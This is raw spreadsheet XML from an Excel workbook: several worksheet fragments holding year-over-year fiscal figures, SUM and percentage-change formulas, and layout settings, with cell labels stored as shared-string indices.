    <row r="60" ht="26.1" customHeight="1" spans="1:2">
      <c r="A60" s="1180" t="s">
        <v>300</v>
      </c>
      <c r="B60" s="1179" t="s">
        <v>301</v>
      </c>
    </row>
    <row r="61" ht="26.1" customHeight="1" spans="1:2">
      <c r="A61" s="1180" t="s">
        <v>302</v>
      </c>
      <c r="B61" s="1177" t="s">
        <v>303</v>
      </c>
    </row>
    <row r="62" ht="26.1" customHeight="1" spans="1:2">
      <c r="A62" s="1180" t="s">
        <v>304</v>
      </c>
      <c r="B62" s="1177" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="63" ht="26.1" customHeight="1" spans="1:2">
      <c r="A63" s="1180" t="s">
        <v>306</v>
      </c>
      <c r="B63" s="1177" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="64" ht="26.1" customHeight="1" spans="1:2">
      <c r="A64" s="1180" t="s">
        <v>308</v>
      </c>
      <c r="B64" s="1177" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="65" ht="26.1" customHeight="1" spans="1:2">
      <c r="A65" s="1180" t="s">
        <v>310</v>
      </c>
      <c r="B65" s="1177" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="66" ht="26.1" customHeight="1" spans="1:2">
      <c r="A66" s="1180" t="s">
        <v>312</v>
      </c>
      <c r="B66" s="1179" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="67" ht="26.1" customHeight="1" spans="1:2">
      <c r="A67" s="1180" t="s">
        <v>314</v>
      </c>
      <c r="B67" s="1177" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="68" ht="26.1" customHeight="1" spans="2:2">
      <c r="B68" s="1175"/>
    </row>
    <row r="69" ht="26.1" customHeight="1" spans="1:2">
      <c r="A69" s="1174" t="s">
        <v>316</v>
      </c>
      <c r="B69" s="1174"/>
    </row>
    <row r="70" ht="26.1" customHeight="1" spans="2:2">
      <c r="B70" s="1175"/>
    </row>
    <row r="71" ht="26.1" customHeight="1" spans="1:2">
      <c r="A71" s="1180" t="s">
        <v>317</v>
      </c>
      <c r="B71" s="1177" t="s">
        <v>318</v>
      </c>
    </row>
    <row r="72" ht="26.1" customHeight="1" spans="1:2">
      <c r="A72" s="1180" t="s">
        <v>319</v>
      </c>
      <c r="B72" s="1177" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="73" ht="26.1" customHeight="1" spans="1:2">
      <c r="A73" s="1180" t="s">
        <v>321</v>
      </c>
      <c r="B73" s="1177" t="s">
        <v>322</v>
      </c>
    </row>
    <row r="74" ht="26.1" customHeight="1" spans="1:2">
      <c r="A74" s="1180" t="s">
        <v>323</v>
      </c>
      <c r="B74" s="1177" t="s">
        <v>324</v>
      </c>
    </row>
    <row r="75" ht="26.1" customHeight="1" spans="1:2">
      <c r="A75" s="1180" t="s">
        <v>325</v>
      </c>
      <c r="B75" s="1177" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="76" ht="26.1" customHeight="1" spans="1:2">
      <c r="A76" s="1180" t="s">
        <v>327</v>
      </c>
      <c r="B76" s="1177" t="s">
        <v>328</v>
      </c>
    </row>
    <row r="77" ht="26.1" customHeight="1" spans="1:2">
      <c r="A77" s="1180" t="s">
        <v>329</v>
      </c>
      <c r="B77" s="1181" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="78" ht="26.1" customHeight="1" spans="1:2">
      <c r="A78" s="1180" t="s">
        <v>331</v>
      </c>
      <c r="B78" s="1177" t="s">
        <v>332</v>
      </c>
    </row>
    <row r="79" ht="26.1" customHeight="1" spans="1:2">
      <c r="A79" s="1180" t="s">
        <v>333</v>
      </c>
      <c r="B79" s="1177" t="s">
        <v>334</v>
      </c>
    </row>
    <row r="80" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A80" s="1180" t="s">
        <v>335</v>
      </c>
      <c r="B80" s="1177" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="81" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A81" s="1180" t="s">
        <v>337</v>
      </c>
      <c r="B81" s="1181" t="s">
        <v>338</v>
      </c>
    </row>
    <row r="82" s="1171" customFormat="1" ht="26.1" customHeight="1" spans="1:2">
      <c r="A82" s="1180" t="s">
        <v>339</v>
      </c>
      <c r="B82" s="1177" t="s">
        <v>340</v>
      </c>
    </row>
    <row r="83" ht="26.1" customHeight="1" spans="1:2">
      <c r="A83" s="1180" t="s">
        <v>341</v>
      </c>
      <c r="B83" s="1177" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="84" ht="26.1" customHeight="1" spans="1:2">
      <c r="A84" s="1180"/>
      <c r="B84" s="1177"/>
    </row>
    <row r="85" ht="26.1" customHeight="1" spans="1:2">
      <c r="A85" s="1182" t="s">
        <v>343</v>
      </c>
      <c r="B85" s="1183"/>
    </row>
    <row r="86" ht="26.1" customHeight="1" spans="1:2">
      <c r="A86" s="1180"/>
      <c r="B86" s="1177"/>
    </row>
    <row r="87" ht="26.1" customHeight="1" spans="1:2">
      <c r="A87" s="1176" t="s">
        <v>344</v>
      </c>
      <c r="B87" s="1177" t="s">
        <v>345</v>
      </c>
    </row>
    <row r="88" ht="26.1" customHeight="1" spans="1:2">
      <c r="A88" s="1176" t="s">
        <v>346</v>
      </c>
      <c r="B88" s="1177" t="s">
        <v>347</v>
      </c>
    </row>
    <row r="89" ht="26.1" customHeight="1" spans="1:2">
      <c r="A89" s="1176" t="s">
        <v>348</v>
      </c>
      <c r="B89" s="1177" t="s">
        <v>349</v>
      </c>
    </row>
    <row r="90" ht="26.1" customHeight="1" spans="1:2">
      <c r="A90" s="1180" t="s">
        <v>350</v>
      </c>
      <c r="B90" s="1177" t="s">
        <v>351</v>
      </c>
    </row>
    <row r="91" ht="26.1" customHeight="1" spans="1:2">
      <c r="A91" s="1180"/>
      <c r="B91" s="1177"/>
    </row>
    <row r="92" ht="26.1" customHeight="1" spans="1:2">
      <c r="A92" s="1176"/>
      <c r="B92" s="1177"/>
    </row>
    <row r="93" ht="26.1" customHeight="1" spans="1:2">
      <c r="A93" s="1182" t="s">
        <v>352</v>
      </c>
      <c r="B93" s="1183"/>
    </row>
    <row r="94" ht="26.1" customHeight="1" spans="1:2">
      <c r="A94" s="1175"/>
      <c r="B94" s="1175"/>
    </row>
    <row r="95" ht="26.1" customHeight="1" spans="1:2">
      <c r="A95" s="1176" t="s">
        <v>353</v>
      </c>
      <c r="B95" s="1177" t="s">
        <v>354</v>
      </c>
    </row>
    <row r="96" ht="26.1" customHeight="1" spans="1:2">
      <c r="A96" s="1176" t="s">
        <v>355</v>
      </c>
      <c r="B96" s="1177" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="97" ht="26.1" customHeight="1" spans="1:2">
      <c r="A97" s="1176" t="s">
        <v>357</v>
      </c>
      <c r="B97" s="1177" t="s">
        <v>358</v>
      </c>
    </row>
    <row r="98" ht="26.1" customHeight="1" spans="1:2">
      <c r="A98" s="1176" t="s">
        <v>359</v>
      </c>
      <c r="B98" s="1177" t="s">
        <v>360</v>
      </c>
    </row>
    <row r="99" ht="26.1" customHeight="1" spans="1:2">
      <c r="A99" s="1176" t="s">
        <v>361</v>
      </c>
      <c r="B99" s="1177" t="s">
        <v>362</v>
      </c>
    </row>
    <row r="100" ht="26.1" customHeight="1" spans="1:2">
      <c r="A100" s="1176" t="s">
        <v>363</v>
      </c>
      <c r="B100" s="1177" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="101" ht="26.1" customHeight="1" spans="1:2">
      <c r="A101" s="1176" t="s">
        <v>365</v>
      </c>
      <c r="B101" s="1177" t="s">
        <v>366</v>
      </c>
    </row>
    <row r="102" ht="26.1" customHeight="1" spans="1:2">
      <c r="A102" s="1176" t="s">
        <v>367</v>
      </c>
      <c r="B102" s="1184" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="103" ht="26.1" customHeight="1" spans="1:2">
      <c r="A103" s="1176" t="s">
        <v>369</v>
      </c>
      <c r="B103" s="1177" t="s">
        <v>370</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="8">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A5:B5"/>
    <mergeCell ref="A21:B21"/>
    <mergeCell ref="A36:B36"/>
    <mergeCell ref="A48:B48"/>
    <mergeCell ref="A69:B69"/>
    <mergeCell ref="A85:B85"/>
    <mergeCell ref="A93:B93"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.59" right="0.59" top="1" bottom="0.79" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:D11"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="2" ySplit="4" topLeftCell="C5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="I23" sqref="I23"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.1481481481481" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="43.4259259259259" style="351" customWidth="1"/>
    <col min="2" max="2" width="20.7222222222222" style="352" customWidth="1"/>
    <col min="3" max="3" width="20.7222222222222" style="353" customWidth="1"/>
    <col min="4" max="4" width="20.7222222222222" style="354" customWidth="1"/>
    <col min="5" max="5" width="12.8425925925926" style="351" customWidth="1"/>
    <col min="6" max="16384" width="10.1481481481481" style="351"/>
  </cols>
  <sheetData>
    <row r="1" s="347" customFormat="1" ht="21.75" customHeight="1" spans="1:4">
      <c r="A1" s="334" t="s">
        <v>932</v>
      </c>
      <c r="B1" s="355"/>
      <c r="C1" s="355"/>
      <c r="D1" s="356"/>
    </row>
    <row r="2" s="348" customFormat="1" ht="30" customHeight="1" spans="1:4">
      <c r="A2" s="357" t="s">
        <v>933</v>
      </c>
      <c r="B2" s="357"/>
      <c r="C2" s="357"/>
      <c r="D2" s="357"/>
    </row>
    <row r="3" s="349" customFormat="1" ht="20.25" customHeight="1" spans="1:4">
      <c r="A3" s="358"/>
      <c r="B3" s="358"/>
      <c r="C3" s="358"/>
      <c r="D3" s="783" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="350" customFormat="1" ht="30.95" customHeight="1" spans="1:4">
      <c r="A4" s="784" t="s">
        <v>931</v>
      </c>
      <c r="B4" s="361" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="361" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="361" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="5" ht="24" customHeight="1" spans="1:4">
      <c r="A5" s="784"/>
      <c r="B5" s="361"/>
      <c r="C5" s="361"/>
      <c r="D5" s="361"/>
    </row>
    <row r="6" ht="29" customHeight="1" spans="1:4">
      <c r="A6" s="362" t="s">
        <v>627</v>
      </c>
      <c r="B6" s="363">
        <v>59396</v>
      </c>
      <c r="C6" s="363">
        <v>62625</v>
      </c>
      <c r="D6" s="364">
        <f t="shared" ref="D6:D11" si="0">(C6-B6)/B6*100</f>
        <v>5.4363930230992</v>
      </c>
    </row>
    <row r="7" ht="29" customHeight="1" spans="1:4">
      <c r="A7" s="365" t="s">
        <v>934</v>
      </c>
      <c r="B7" s="366">
        <v>57493</v>
      </c>
      <c r="C7" s="366">
        <v>61025</v>
      </c>
      <c r="D7" s="367">
        <f t="shared" si="0"/>
        <v>6.14335658254048</v>
      </c>
    </row>
    <row r="8" ht="29" customHeight="1" spans="1:4">
      <c r="A8" s="365" t="s">
        <v>629</v>
      </c>
      <c r="B8" s="366">
        <v>40897</v>
      </c>
      <c r="C8" s="366">
        <v>46937</v>
      </c>
      <c r="D8" s="367">
        <f t="shared" si="0"/>
        <v>14.7688094481258</v>
      </c>
    </row>
    <row r="9" ht="29" customHeight="1" spans="1:4">
      <c r="A9" s="365" t="s">
        <v>935</v>
      </c>
      <c r="B9" s="366">
        <v>40857</v>
      </c>
      <c r="C9" s="366">
        <v>46896</v>
      </c>
      <c r="D9" s="367">
        <f t="shared" si="0"/>
        <v>14.7808209119612</v>
      </c>
    </row>
    <row r="10" ht="29" customHeight="1" spans="1:4">
      <c r="A10" s="785" t="s">
        <v>631</v>
      </c>
      <c r="B10" s="368">
        <v>100293</v>
      </c>
      <c r="C10" s="368">
        <v>109562</v>
      </c>
      <c r="D10" s="369">
        <f t="shared" si="0"/>
        <v>9.24192117096906</v>
      </c>
    </row>
    <row r="11" ht="29" customHeight="1" spans="1:4">
      <c r="A11" s="370" t="s">
        <v>936</v>
      </c>
      <c r="B11" s="371">
        <v>98350</v>
      </c>
      <c r="C11" s="371">
        <v>107921</v>
      </c>
      <c r="D11" s="372">
        <f t="shared" si="0"/>
        <v>9.73157092018302</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="D4:D5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.590277777777778" right="0.590277777777778" top="0.790972222222222" bottom="0.790972222222222" header="0.310416666666667" footer="0.310416666666667"/>
  <pageSetup paperSize="9" scale="95" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:H62"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="E4" sqref="E4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelCol="7"/>
  <cols>
    <col min="1" max="1" width="43" style="184" customWidth="1"/>
    <col min="2" max="2" width="34.1481481481481" style="184" customWidth="1"/>
    <col min="3" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:5">
      <c r="A1" s="334" t="s">
        <v>937</v>
      </c>
      <c r="B1" s="335"/>
      <c r="C1" s="336"/>
      <c r="D1" s="336"/>
      <c r="E1" s="336"/>
    </row>
    <row r="2" ht="18" customHeight="1" spans="1:5">
      <c r="A2" s="334"/>
      <c r="B2" s="335"/>
      <c r="C2" s="336"/>
      <c r="D2" s="336"/>
      <c r="E2" s="336"/>
    </row>
    <row r="3" ht="39" customHeight="1" spans="1:5">
      <c r="A3" s="337" t="s">
        <v>938</v>
      </c>
      <c r="B3" s="337"/>
      <c r="C3" s="336"/>
      <c r="D3" s="336"/>
      <c r="E3" s="336"/>
    </row>
    <row r="4" ht="27" customHeight="1" spans="1:5">
      <c r="A4" s="336"/>
      <c r="B4" s="338" t="s">
        <v>373</v>
      </c>
      <c r="C4" s="336"/>
      <c r="D4" s="336"/>
      <c r="E4" s="336"/>
    </row>
    <row r="5" ht="42.95" customHeight="1" spans="1:5">
      <c r="A5" s="339" t="s">
        <v>931</v>
      </c>
      <c r="B5" s="340" t="s">
        <v>829</v>
      </c>
      <c r="C5" s="336"/>
      <c r="D5" s="336"/>
      <c r="E5" s="336"/>
    </row>
    <row r="6" ht="39.95" customHeight="1" spans="1:8">
      <c r="A6" s="341" t="s">
        <v>635</v>
      </c>
      <c r="B6" s="342">
        <f>SUM(B7:B8)</f>
        <v>82602</v>
      </c>
      <c r="C6" s="336"/>
      <c r="D6" s="336"/>
      <c r="E6" s="336"/>
      <c r="G6" s="343" t="s">
        <v>939</v>
      </c>
      <c r="H6" s="343" t="s">
        <v>939</v>
      </c>
    </row>
    <row r="7" ht="39.95" customHeight="1" spans="1:5">
      <c r="A7" s="344" t="s">
        <v>636</v>
      </c>
      <c r="B7" s="345">
        <v>1619</v>
      </c>
      <c r="C7" s="336"/>
      <c r="D7" s="336"/>
      <c r="E7" s="336"/>
    </row>
    <row r="8" ht="39.95" customHeight="1" spans="1:5">
      <c r="A8" s="344" t="s">
        <v>637</v>
      </c>
      <c r="B8" s="345">
        <v>80983</v>
      </c>
      <c r="C8" s="336"/>
      <c r="D8" s="336"/>
      <c r="E8" s="336"/>
    </row>
    <row r="9" spans="1:5">
      <c r="A9" s="336"/>
      <c r="B9" s="346"/>
      <c r="C9" s="336"/>
      <c r="D9" s="336"/>
      <c r="E9" s="336"/>
    </row>
    <row r="10" spans="1:5">
      <c r="A10" s="336"/>
      <c r="B10" s="346"/>
      <c r="C10" s="336"/>
      <c r="D10" s="336"/>
      <c r="E10" s="336"/>
    </row>
    <row r="11" spans="1:5">
      <c r="A11" s="336"/>
      <c r="B11" s="346"/>
      <c r="C11" s="336"/>
      <c r="D11" s="336"/>
      <c r="E11" s="336"/>
    </row>
    <row r="12" spans="1:5">
      <c r="A12" s="336"/>
      <c r="B12" s="346"/>
      <c r="C12" s="336"/>
      <c r="D12" s="336"/>
      <c r="E12" s="336"/>
    </row>
    <row r="13" spans="1:5">
      <c r="A13" s="336"/>
      <c r="B13" s="346"/>
      <c r="C13" s="336"/>
      <c r="D13" s="336"/>
      <c r="E13" s="336"/>
    </row>
    <row r="14" spans="1:5">
      <c r="A14" s="336"/>
      <c r="B14" s="346"/>
      <c r="C14" s="336"/>
      <c r="D14" s="336"/>
      <c r="E14" s="336"/>
    </row>
    <row r="15" spans="1:5">
      <c r="A15" s="336"/>
      <c r="B15" s="346"/>
      <c r="C15" s="336"/>
      <c r="D15" s="336"/>
      <c r="E15" s="336"/>
    </row>
    <row r="16" spans="1:5">
      <c r="A16" s="336"/>
      <c r="B16" s="346"/>
      <c r="C16" s="336"/>
      <c r="D16" s="336"/>
      <c r="E16" s="336"/>
    </row>
    <row r="17" spans="1:5">
      <c r="A17" s="336"/>
      <c r="B17" s="346"/>
      <c r="C17" s="336"/>
      <c r="D17" s="336"/>
      <c r="E17" s="336"/>
    </row>
    <row r="18" spans="1:5">
      <c r="A18" s="336"/>
      <c r="B18" s="346"/>
      <c r="C18" s="336"/>
      <c r="D18" s="336"/>
      <c r="E18" s="336"/>
    </row>
    <row r="19" spans="1:5">
      <c r="A19" s="336"/>
      <c r="B19" s="346"/>
      <c r="C19" s="336"/>
      <c r="D19" s="336"/>
      <c r="E19" s="336"/>
    </row>
    <row r="20" spans="1:5">
      <c r="A20" s="336"/>
      <c r="B20" s="346"/>
      <c r="C20" s="336"/>
      <c r="D20" s="336"/>
      <c r="E20" s="336"/>
    </row>
    <row r="21" spans="1:5">
      <c r="A21" s="336"/>
      <c r="B21" s="346"/>
      <c r="C21" s="336"/>
      <c r="D21" s="336"/>
      <c r="E21" s="336"/>
    </row>
    <row r="22" spans="1:5">
      <c r="A22" s="336"/>
      <c r="B22" s="346"/>
      <c r="C22" s="336"/>
      <c r="D22" s="336"/>
      <c r="E22" s="336"/>
    </row>
    <row r="23" spans="1:5">
      <c r="A23" s="336"/>
      <c r="B23" s="346"/>
      <c r="C23" s="336"/>
      <c r="D23" s="336"/>
      <c r="E23" s="336"/>
    </row>
    <row r="24" spans="1:5">
      <c r="A24" s="336"/>
      <c r="B24" s="346"/>
      <c r="C24" s="336"/>
      <c r="D24" s="336"/>
      <c r="E24" s="336"/>
    </row>
    <row r="25" spans="2:2">
      <c r="B25" s="346"/>
    </row>
    <row r="26" spans="1:5">
      <c r="A26" s="336"/>
      <c r="B26" s="346"/>
      <c r="C26" s="336"/>
      <c r="D26" s="336"/>
      <c r="E26" s="336"/>
    </row>
    <row r="27" spans="1:5">
      <c r="A27" s="336"/>
      <c r="B27" s="346"/>
      <c r="C27" s="336"/>
      <c r="D27" s="336"/>
      <c r="E27" s="336"/>
    </row>
    <row r="28" spans="1:5">
      <c r="A28" s="336"/>
      <c r="B28" s="346"/>
      <c r="C28" s="336"/>
      <c r="D28" s="336"/>
      <c r="E28" s="336"/>
    </row>
    <row r="29" spans="1:5">
      <c r="A29" s="336"/>
      <c r="B29" s="346"/>
      <c r="C29" s="336"/>
      <c r="D29" s="336"/>
      <c r="E29" s="336"/>
    </row>
    <row r="30" spans="1:5">
      <c r="A30" s="336"/>
      <c r="B30" s="346"/>
      <c r="C30" s="336"/>
      <c r="D30" s="336"/>
      <c r="E30" s="336"/>
    </row>
    <row r="31" spans="1:5">
      <c r="A31" s="336"/>
      <c r="B31" s="346"/>
      <c r="C31" s="336"/>
      <c r="D31" s="336"/>
      <c r="E31" s="336"/>
    </row>
    <row r="32" spans="1:5">
      <c r="A32" s="336"/>
      <c r="B32" s="346"/>
      <c r="C32" s="336"/>
      <c r="D32" s="336"/>
      <c r="E32" s="336"/>
    </row>
    <row r="33" spans="1:5">
      <c r="A33" s="336"/>
      <c r="B33" s="346"/>
      <c r="C33" s="336"/>
      <c r="D33" s="336"/>
      <c r="E33" s="336"/>
    </row>
    <row r="34" spans="2:2">
      <c r="B34" s="346"/>
    </row>
    <row r="35" spans="2:2">
      <c r="B35" s="346"/>
    </row>
    <row r="36" spans="2:2">
      <c r="B36" s="346"/>
    </row>
    <row r="37" spans="2:2">
      <c r="B37" s="346"/>
    </row>
    <row r="38" spans="2:2">
      <c r="B38" s="346"/>
    </row>
    <row r="39" spans="2:2">
      <c r="B39" s="346"/>
    </row>
    <row r="40" spans="2:2">
      <c r="B40" s="346"/>
    </row>
    <row r="41" spans="2:2">
      <c r="B41" s="346"/>
    </row>
    <row r="42" spans="2:2">
      <c r="B42" s="346"/>
    </row>
    <row r="43" spans="2:2">
      <c r="B43" s="346"/>
    </row>
    <row r="44" spans="2:2">
      <c r="B44" s="346"/>
    </row>
    <row r="45" spans="2:2">
      <c r="B45" s="346"/>
    </row>
    <row r="46" spans="2:2">
      <c r="B46" s="346"/>
    </row>
    <row r="47" spans="2:2">
      <c r="B47" s="346"/>
    </row>
    <row r="48" spans="2:2">
      <c r="B48" s="346"/>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="346"/>
    </row>
    <row r="50" spans="2:2">
      <c r="B50" s="346"/>
    </row>
    <row r="51" spans="2:2">
      <c r="B51" s="346"/>
    </row>
    <row r="52" spans="2:2">
      <c r="B52" s="346"/>
    </row>
    <row r="53" spans="2:2">
      <c r="B53" s="346"/>
    </row>
    <row r="54" spans="2:2">
      <c r="B54" s="346"/>
    </row>
    <row r="55" spans="2:2">
      <c r="B55" s="346"/>
    </row>
    <row r="56" spans="2:2">
      <c r="B56" s="346"/>
    </row>
    <row r="57" spans="2:2">
      <c r="B57" s="346"/>
    </row>
    <row r="58" spans="2:2">
      <c r="B58" s="346"/>
    </row>
    <row r="59" spans="2:2">
      <c r="B59" s="346"/>
    </row>
    <row r="60" spans="2:2">
      <c r="B60" s="346"/>
    </row>
    <row r="61" spans="2:2">
      <c r="B61" s="346"/>
    </row>
    <row r="62" spans="2:2">
      <c r="B62" s="346"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A3:B3"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>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7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A3" sqref="A3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.14814814814815" defaultRowHeight="13.2" outlineLevelRow="6"/>
  <cols>
    <col min="1" max="1" width="89.7222222222222" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="57" customHeight="1"/>
    <row r="2" ht="57" customHeight="1"/>
    <row r="3" ht="148.8" spans="1:1">
      <c r="A3" s="78" t="s">
        <v>940</v>
      </c>
    </row>
    <row r="4" ht="57" customHeight="1"/>
    <row r="5" ht="57" customHeight="1"/>
    <row r="6" ht="57" customHeight="1"/>
    <row r="7" ht="57" customHeight="1"/>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:D42"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B18" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="G9" sqref="G9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.84259259259259" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="36.7222222222222" style="756" customWidth="1"/>
    <col min="2" max="2" width="17.1481481481481" style="756" customWidth="1"/>
    <col min="3" max="3" width="16.4259259259259" style="756" customWidth="1"/>
    <col min="4" max="4" width="15" style="757" customWidth="1"/>
    <col min="5" max="16384" width="9.84259259259259" style="756"/>
  </cols>
  <sheetData>
    <row r="1" s="751" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A1" s="334" t="s">
        <v>941</v>
      </c>
      <c r="B1" s="758"/>
      <c r="C1" s="758"/>
      <c r="D1" s="759"/>
    </row>
    <row r="2" s="752" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A2" s="760" t="s">
        <v>942</v>
      </c>
      <c r="B2" s="760"/>
      <c r="C2" s="760"/>
      <c r="D2" s="760"/>
    </row>
    <row r="3" s="753" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A3" s="761"/>
      <c r="B3" s="761"/>
      <c r="C3" s="568"/>
      <c r="D3" s="762" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="754" customFormat="1" ht="27.95" customHeight="1" spans="1:4">
      <c r="A4" s="763" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="361" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="764" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="765" t="s">
        <v>917</v>
      </c>
    </row>
    <row r="5" s="718" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A5" s="766" t="s">
        <v>830</v>
      </c>
      <c r="B5" s="767">
        <f>SUM(B6:B20)</f>
        <v>91601</v>
      </c>
      <c r="C5" s="767">
        <f>SUM(C6:C20)</f>
        <v>97300</v>
      </c>
      <c r="D5" s="733">
        <f>IFERROR((C5-B5)/B5*100,"-")</f>
        <v>6.22154779969651</v>
      </c>
    </row>
    <row r="6" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A6" s="768" t="s">
        <v>831</v>
      </c>
      <c r="B6" s="767">
        <v>34082</v>
      </c>
      <c r="C6" s="767">
        <v>34732</v>
      </c>
      <c r="D6" s="733">
        <f>IFERROR((C6-B6)/B6*100,"-")</f>
        <v>1.90716507247227</v>
      </c>
    </row>
    <row r="7" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A7" s="768" t="s">
        <v>832</v>
      </c>
      <c r="B7" s="767">
        <v>20626</v>
      </c>
      <c r="C7" s="767">
        <v>21265</v>
      </c>
      <c r="D7" s="733">
        <f>IFERROR((C7-B7)/B7*100,"-")</f>
        <v>3.09803161058858</v>
      </c>
    </row>
    <row r="8" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A8" s="768" t="s">
        <v>833</v>
      </c>
      <c r="B8" s="767">
        <v>4072</v>
      </c>
      <c r="C8" s="767">
        <v>4144</v>
      </c>
      <c r="D8" s="733">
        <f t="shared" ref="D8:D19" si="0">IFERROR((C8-B8)/B8*100,"-")</f>
        <v>1.76817288801572</v>
      </c>
    </row>
    <row r="9" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A9" s="768" t="s">
        <v>834</v>
      </c>
      <c r="B9" s="767">
        <v>1797</v>
      </c>
      <c r="C9" s="767">
        <v>1854</v>
      </c>
      <c r="D9" s="733">
        <f t="shared" si="0"/>
        <v>3.17195325542571</v>
      </c>
    </row>
    <row r="10" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A10" s="768" t="s">
        <v>835</v>
      </c>
      <c r="B10" s="767">
        <v>3439</v>
      </c>
      <c r="C10" s="767">
        <v>3544</v>
      </c>
      <c r="D10" s="733">
        <f t="shared" si="0"/>
        <v>3.05321314335563</v>
      </c>
    </row>
    <row r="11" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A11" s="768" t="s">
        <v>836</v>
      </c>
      <c r="B11" s="767">
        <v>9883</v>
      </c>
      <c r="C11" s="767">
        <v>10515</v>
      </c>
      <c r="D11" s="733">
        <f t="shared" si="0"/>
        <v>6.39481938682586</v>
      </c>
    </row>
    <row r="12" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A12" s="768" t="s">
        <v>837</v>
      </c>
      <c r="B12" s="767">
        <v>1428</v>
      </c>
      <c r="C12" s="767">
        <v>1289</v>
      </c>
      <c r="D12" s="733">
        <f t="shared" si="0"/>
        <v>-9.73389355742297</v>
      </c>
    </row>
    <row r="13" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A13" s="768" t="s">
        <v>838</v>
      </c>
      <c r="B13" s="767">
        <v>4170</v>
      </c>
      <c r="C13" s="767">
        <v>4559</v>
      </c>
      <c r="D13" s="733">
        <f t="shared" si="0"/>
        <v>9.32853717026379</v>
      </c>
    </row>
    <row r="14" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A14" s="768" t="s">
        <v>839</v>
      </c>
      <c r="B14" s="767">
        <v>-1956</v>
      </c>
      <c r="C14" s="767">
        <v>863</v>
      </c>
      <c r="D14" s="733">
        <f t="shared" si="0"/>
